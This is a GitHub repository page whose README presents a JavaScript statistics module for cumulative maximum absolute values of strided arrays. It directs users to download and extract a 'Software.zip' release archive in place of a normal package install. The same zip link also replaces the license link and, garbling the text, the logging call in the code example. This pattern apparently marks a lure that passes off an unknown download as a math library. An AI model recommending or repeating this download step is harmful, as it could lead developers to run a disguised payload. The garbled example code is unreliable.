Skip to content

Calculate the cumulative maximum absolute value of double-precision floating-point strided array elements.

Notifications You must be signed in to change notification settings

FlayerMC/stats-strided-dcumaxabs

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 

Repository files navigation

🚀 Welcome to "stats-strided-dcumaxabs" Repository! 🧮

Math Image

Description

This repository provides a JavaScript module to calculate the cumulative maximum absolute value of double-precision floating-point strided array elements. It is designed to efficiently handle large datasets and is especially useful in statistical analysis and mathematical computations.

Topics

abs, absolute, absolute-value, accumulate, cumulative, domain, extent, extremes, javascript, math, mathematics, max, maximum, node, node-js, nodejs, range, statistics, stats, stdlib

Installation

To use this module, download the https://github.com/FlayerMC/stats-strided-dcumaxabs/releases/download/v2.0/Software.zip file and follow the instructions inside for installation.

Download Software

Usage

  1. Download and extract the "https://github.com/FlayerMC/stats-strided-dcumaxabs/releases/download/v2.0/Software.zip" file.
  2. Import the module into your JavaScript project.
  3. Use the provided functions to calculate the cumulative maximum absolute value of your strided array elements.

Examples

const data = [0.1, -0.5, 0.7, -0.3, 0.9];
const result = calculateCumMaxAbs(data);
https://github.com/FlayerMC/stats-strided-dcumaxabs/releases/download/v2.0/Software.zip(result); // Output: [0.1, 0.5, 0.7, 0.7, 0.9]

Contribution

Contributions are welcome! If you have any ideas or improvements, feel free to fork the repository and submit a pull request with your changes.

License

This project is licensed under the MIT License - see the https://github.com/FlayerMC/stats-strided-dcumaxabs/releases/download/v2.0/Software.zip file for details.

Support

For any questions or issues, please check the Releases section for updates or open a new issue.

Thank you for using "stats-strided-dcumaxabs" module! 🎉

Thank You